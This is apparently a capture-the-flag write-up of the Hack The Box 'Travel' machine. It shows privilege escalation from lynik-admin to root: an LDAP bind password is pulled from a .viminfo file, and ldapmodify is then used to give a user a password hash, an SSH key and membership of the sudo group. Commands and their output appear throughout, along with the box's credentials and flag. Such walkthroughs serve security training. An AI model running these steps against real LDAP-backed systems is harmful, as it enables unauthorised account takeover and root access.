ssh lynik-admin@travel.htb
lynik-admin@travel.htb's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

lynik-admin@travel:~$ 

Great, we have a shell! Now let's take a look.

lynik-admin@travel:~$ ls -l
total 4
-r--r--r-- 1 root root 33 May 24 09:16 user.txt

lynik-admin

We managed to escape from www-data and the Docker container. We are now logged in as lynik-admin. Let’s take a look at the user’s home folder before we start enumeration scripts. A few files caught my attention:

ls -la
-rw-r--r-- 1 lynik-admin lynik-admin   82 Apr 23 19:35 .ldaprc
-rw------- 1 lynik-admin lynik-admin  861 Apr 23 19:35 .viminfo

.ldaprc is a configuration file to be applied when running Lightweight Directory Access Protocol (LDAP) clients. So there is probably an LDAP server running on this machine.

.viminfo is a cache file for the Vim editor. It remembers the history from the last session, which enables you to continue where you left off when reopening a file.

cat .ldaprc 
HOST ldap.travel.htb
BASE dc=travel,dc=htb
BINDDN cn=lynik-admin,dc=travel,dc=htb

These appear to be defaults to use when performing LDAP operations. Let’s take a look at the .viminfo file. It might have changed these properties.

cat .viminfo
# Registers:
""1     LINE    0
        BINDPW Theroadlesstraveled
|3,1,1,1,1,0,1587670528,"BINDPW Theroadlesstraveled"

# File marks:
'0  3  0  ~/.ldaprc
|4,48,3,0,1587670530,"~/.ldaprc"

So, although this syntax might appear a bit obscure, it is safe to assume they removed BINDPW Theroadlesstraveled from the .ldaprc file. Unfortunately, the Vim history is still present.

  • HOST: Specifies the name(s) of an LDAP server(s) to which the LDAP library should connect.
  • BASE: Specifies the default base DN to use when performing LDAP operations. The base must be specified as a Distinguished Name in LDAP format.
  • BINDDN: Specifies the default bind DN to use when performing LDAP operations. The bind DN must be specified as a Distinguished Name in LDAP format.
  • BINDPW: The password used when binding to the LDAP server (if BINDDN was defined).

I did not add BINDPW back to this file, as it would spoil this step for other hackers.

I decided to learn a bit about the LDAP protocol as it is a bit hard to understand without the basics. I found the OpenLDAP’s Introduction to OpenLDAP Directory Services pretty useful.

Exploring LDAP

Using TAB completion I discovered which LDAP client tools are present on this machine.

lynik-admin@travel:~$ ldap
ldapadd      ldapcompare  ldapdelete   ldapexop     ldapmodify   ldapmodrdn   ldappasswd   ldapsearch   ldapurl      ldapwhoami

First let’s find out who we are. ldapwhoami sounds suitable for this job.

lynik-admin@travel:~$ ldapwhoami
SASL/SCRAM-SHA-1 authentication started
Please enter your password: 
ldap_sasl_interactive_bind_s: Invalid credentials (49)
        additional info: SASL(-13): user not found: no secret in database

Apparently my credentials were not used: without extra flags, ldapwhoami attempts a SASL bind. Let’s take a look at the documentation; I’ll show only the relevant parts.

NAME
       ldapwhoami - LDAP who am i? tool
       
OPTIONS
       -x     Use simple authentication instead of SASL.

       -D binddn
              Use the Distinguished Name binddn to bind to the LDAP directory.  For SASL binds, the server is expected to ignore this value.
              
       -w passwd
              Use passwd as the password for simple authentication.              

To summarize: to make use of our BINDDN we need simple authentication (-x), and with -w we can supply the missing password.

lynik-admin@travel:~$ ldapwhoami -x -w Theroadlesstraveled
dn:cn=lynik-admin,dc=travel,dc=htb

Great, so we were able to authenticate to the LDAP server and retrieve our DN. Let’s find out what else is in this directory. Inspecting man ldapsearch shows the authentication flags are the same. I left out most of the users and other entries for readability.

lynik-admin@travel:~$ ldapsearch -x -w Theroadlesstraveled
# extended LDIF
#
# LDAPv3
# base <dc=travel,dc=htb> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lynik-admin, travel.htb
dn: cn=lynik-admin,dc=travel,dc=htb
description: LDAP administrator
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: lynik-admin
userPassword:: e1NTSEF9MEpaelF3blZJNEZrcXRUa3pRWUxVY3ZkN1NwRjFRYkRjVFJta3c9PQ=
 =

# lynik, users, linux, servers, travel.htb
dn: uid=lynik,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: lynik
uidNumber: 5000
homeDirectory: /home/lynik
givenName: Lynik
gidNumber: 5000
sn: Schmidt
cn: Lynik Schmidt
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash

# gloria, users, linux, servers, travel.htb
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: gloria
uidNumber: 5010
homeDirectory: /home/gloria
givenName: Gloria
gidNumber: 5000
sn: Wood
cn: Gloria Wood
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash

# search result
search: 2
result: 0 Success

# numResponses: 22
# numEntries: 21

So, we find our lynik-admin account, with which we administer the directory, as well as a lot of users. Particularly interesting are the posixAccount and shadowAccount object classes, which provide the loginShell, homeDirectory, uidNumber and gidNumber attributes. This configuration implies we might be able to authenticate to this system through LDAP.

Because we are the LDAP administrator, we can reconfigure accounts to grant them more privileges on the local machine. Note that lynik-admin is not a person/posixAccount entry, so we apparently SSHed into this machine with a local account. Therefore I’ll need a way to authenticate as one of the LDAP users. Let’s try to look up the gloria user.

getent passwd gloria
gloria:*:5010:5000:Gloria Wood:/home@TRAVEL/gloria:/bin/bash

Great! So, it looks like this machine is configured for LDAP authentication.
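getent resolves users through the Name Service Switch (NSS), the same path every NSS-aware program on the box takes. As a small generic illustration (not specific to this machine), Python’s standard pwd module performs exactly this lookup; on the target it would chain files, systemd and finally sss, and hence LDAP:

```python
import pwd

# getpwnam() asks NSS to resolve a user; on the target this consults
# local files, systemd and finally sss (backed by LDAP).
# "root" is used here because that account exists on any system.
entry = pwd.getpwnam("root")
print(entry.pw_name, entry.pw_uid, entry.pw_dir, entry.pw_shell)
```

A nonexistent user raises KeyError, which is how getent-style tools report lookup failures.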

Gloria

Let’s pick Gloria to gain access.

# gloria, users, linux, servers, travel.htb
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: gloria
uidNumber: 5010
homeDirectory: /home/gloria
givenName: Gloria
gidNumber: 5000
sn: Wood
cn: Gloria Wood
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash

To be able to authenticate to a system we need a password; my first guess for the attribute name was authPassword. During the orientation I had found the ldapmodify tool. By reading its man page I came up with the command below to add the password attribute to the user.

When inspecting lynik-admin I noticed its userPassword value has a base64-encoded representation (the double colon in userPassword:: is LDIF’s marker for base64). It took me a while to figure out that ldapsearch applies the base64 encoding on output and that the value is not stored encoded in the database. Therefore there is no need to encode it when inserting.

echo e1NTSEF9MEpaelF3blZJNEZrcXRUa3pRWUxVY3ZkN1NwRjFRYkRjVFJta3c9PQ== | base64 -d
{SSHA}0JZzQwnVI4FkqtTkzQYLUcvd7SpF1QbDcTRmkw==
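The decoded value is an SSHA (salted SHA-1) hash: a 20-byte SHA-1 digest of password+salt, followed by the salt, all base64-encoded. A minimal generic sketch of how such hashes are created and checked (an illustration, not code taken from the box):

```python
import base64
import hashlib
import os

def ssha_hash(password, salt=None):
    # {SSHA} = base64( sha1(password + salt) + salt )
    salt = salt if salt is not None else os.urandom(4)
    digest = hashlib.sha1(password.encode() + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode()

def ssha_verify(password, ssha):
    raw = base64.b64decode(ssha[len("{SSHA}"):])
    digest, salt = raw[:20], raw[20:]  # SHA-1 digests are always 20 bytes
    return hashlib.sha1(password.encode() + salt).digest() == digest

demo = ssha_hash("Theroadlesstraveled")
print(ssha_verify("Theroadlesstraveled", demo))  # True
print(ssha_verify("wrong-password", demo))       # False
```

Because the salt rides along inside the value, copying the full hash to another account transfers the original password unchanged.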

The attribute is set as a scheme tag followed by a value. Let’s just reuse lynik-admin’s value.

cat addpass
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: authPassword
authPassword: {SSHA}0JZzQwnVI4FkqtTkzQYLUcvd7SpF1QbDcTRmkw==
lynik-admin@travel:~$ ldapmodify -x -w Theroadlesstraveled -f addpass
authPassword: attribute type undefined

For some reason the attribute type is not defined in this server’s schema. Earlier I noticed the userPassword attribute on lynik-admin; let’s use that attribute in addpass instead.
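For completeness, the corrected addpass file (my reconstruction; it is the same LDIF with only the attribute renamed to userPassword):

```
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: userPassword
userPassword: {SSHA}0JZzQwnVI4FkqtTkzQYLUcvd7SpF1QbDcTRmkw==
```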

lynik-admin@travel:~$ ldapmodify -x -w Theroadlesstraveled -f addpass
modifying entry "uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

Great. Let’s test whether we can authenticate to LDAP. Note: reusing lynik-admin’s hash would make gloria’s password Theroadlesstraveled; in the session below I had meanwhile set a hash for a password of my own choosing, myrtle123.

lynik-admin@travel:~/.myrtle$ ldapwhoami -D uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb -x -w myrtle123
dn:uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

That works. Let’s try to switch to gloria on the box itself.

lynik-admin@travel:~/.myrtle$ su -l gloria
Password: 
su: Permission denied

Looks like we cannot authenticate. Let’s try SSH:

ssh gloria@travel.htb
gloria@travel.htb: Permission denied (publickey).

So that failed as well. We need to take a better look at how LDAP authentication is configured on this machine.

SSSD

Let’s grab a fresh copy of lse.sh and run it against this machine. The relevant findings:

./lse.sh -l2
[i] usr050 Groups for other users.......................................... yes!
---
sssd:x:118:

[i] usr060 Other users..................................................... yes!
---
sssd:x:113:118:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin

[*] fst000 Writable files outside user's home.............................. yes!
---
/var/lib/sss/pipes/pam
/var/lib/sss/pipes/nss
/var/lib/sss/pipes/ssh

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/p11_child

This machine is running the System Security Services Daemon.

man sssd
NAME
       sssd - System Security Services Daemon
      
DESCRIPTION
       SSSD provides a set of daemons to manage access to remote directories and authentication mechanisms. It provides an NSS and PAM interface toward the system and a pluggable backend system to connect to multiple different account sources as well as D-Bus
       interface. It is also the basis to provide client auditing and policy services for projects like FreeIPA. It provides a more robust database to store local users as well as extended user data.

We have already confirmed NSS is able to find the gloria user. Let’s take a look at its configuration file to see whether it consults sssd.

$ cat /etc/nsswitch.conf
passwd:		files systemd sss
group:		files systemd sss
shadow:		files sss
gshadow:	files

It does: sss is listed for the passwd, group and shadow databases. Next, let’s find out whether PAM is configured to use SSSD.

cd /etc/pam.d
grep -R sss
$ grep -R sss
common-session:session  optional                        pam_sss.so 
common-password:password        sufficient                      pam_sss.so use_authtok
common-auth:auth        [success=1 default=ignore]      pam_sss.so use_first_pass
common-account:account  [default=bad success=ok user_unknown=ignore]    pam_sss.so 

So PAM is configured to use SSSD as well. That is interesting, because by default sshd authenticates through PAM too.

Let’s take a look at the sshd configuration.

/etc/ssh/sshd_config
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing.
UsePAM yes

PasswordAuthentication no
Match User trvl-admin,lynik-admin
        PasswordAuthentication yes

We confirmed that sshd is configured to use PAM. We also learn password authentication is disabled except for the trvl-admin and lynik-admin users.

Let’s confirm that SSSD is configured to use LDAP.

$ cat /etc/sssd/sssd.conf 
cat: /etc/sssd/sssd.conf: Permission denied

Unfortunately we cannot read its configuration, but it is very likely that SSSD is the bridge between PAM/NSS and the LDAP server.

SSH LDAP Authentication

So, if everything is configured correctly, why can I not log in using su -l? Let’s put that question aside for now; maybe I can authenticate using an SSH key instead.

I found a nice article by Kouhei Maeda about this subject. If this server implements SSH public keys in LDAP, they probably installed a similar schema. To test this, let’s add the objectClass ldapPublicKey and its attribute sshPublicKey to gloria.

dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0/NWbIQLtlAcy33Rz9xOGywZ1VqiieLOf9nCrgOUbbZ6UusUQ+/kAtiD95krXxCyite7MAhCD41FtOZynUE0y+vGp0/vDg0gpXhVcrpWRr3JpK3eZMJYaEoYrYRlBkdaqrctV6fH/Fa7K/b+/5VJ1RtBWUGL4FGTKjH5Xh2pPvUXCHuheEHx6wgkFmcFGPGAgfgVXzak9ip+auvo3KlLWvJDmv1urdPGgtWS1C3opSf1ooT+fSz+ADfLhqXIuB6JXJXNXq7bdADS9JmUwRtG3Q7k5Yr+z8jxNKYC6cAanCTPLpG74ZxetMHur0eYCzrxTHyGrRuBsyRvxvpJPM/1G8d1LjnSSXF5DDkWLdMyLmV98pML0qIlCt911VSxzBoAijQRGey2k9YTgbzoLw+Lf0oAv31iQYZxtLrQ4FTUsovG1yM9IBvDxrOSQ1Ax6bzwDpWf/53bA9tgkSUoQC3ihXWj30W6P8Lj8LesMPn4xfxcyMKF/CARQyTSrYoMhQM8= foo

After running ldapmodify again, it reported no errors. Let’s try to authenticate using SSH.

ssh gloria@travel.htb
Creating directory '/home@TRAVEL/gloria'.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

Bingo, we have a shell!

Let’s see who we are.

gloria@travel:~$ id
uid=5010(gloria) gid=5000(domainusers) groups=5000(domainusers)

Conveniently, our local uid and gid are set to the values configured in LDAP. That means that, using the LDAP administrator account, we can give a user any privileges available on this target machine.

At first I tried to join the root group, but that did not work. However, we can still gain root privileges if a user is allowed to use sudo. Therefore, let’s make sudo our user’s primary group.

gloria@travel:~$ cat /etc/group | grep sudo
sudo:x:27:trvl-admin
cat changegroup
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: gidNumber
gidNumber: 27
lynik-admin@travel:~/.myrtle$ ldapmodify -x -w Theroadlesstraveled -f changegroup
modifying entry "uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

Let’s authenticate again and use sudo. A little note: a cleanup script resets the LDAP directory from time to time, so you might need to repeat the previous steps first.

gloria@travel:~$ sudo su
root@travel:/home@TRAVEL/gloria#

Let’s grab our root.txt. Congratulations, you have rooted this machine.

cat /root/root.txt
Li5yLmUuYS5sLmwueS4/LkwuTy5MLi5NLnkucnRsZS4=

Retrospective

So, let’s figure out why I could not authenticate as gloria with a password. Now that we are root, let’s take a look at sssd.conf first.

cat /etc/sssd/sssd.conf
[nss]
filter_users = root
filter_groups = root

[pam]

[domain/TRAVEL]
use_fully_qualified_names = False
override_homedir = /home@TRAVEL/%u
id_provider = ldap
auth_provider = ldap
(..)
ldap_user_search_base = ou=users,ou=linux,ou=servers,dc=travel,dc=htb

First, these lines explain two earlier observations: filter_users and filter_groups exclude root from SSSD’s results, which is why joining the root group did not work, and override_homedir explains the /home@TRAVEL/gloria home directory we saw with getent. We also confirm sssd is indeed configured to use LDAP as both identity and authentication provider.

Back to su -l. I suspected the PAM configuration, so I asked jkr, one of the box’s creators, for some pointers. He suggested taking a look at wheel in the su configuration.

cat /etc/pam.d/su

# Uncomment this to force users to be a member of group root
# before they can use `su'. 
auth       required   pam_wheel.so

There it is: pam_wheel.so is enabled, so su only works for callers that are members of the root group. Since lynik-admin is not a member of that group, su -l gloria was denied regardless of the password, while SSH key authentication through sssd worked fine.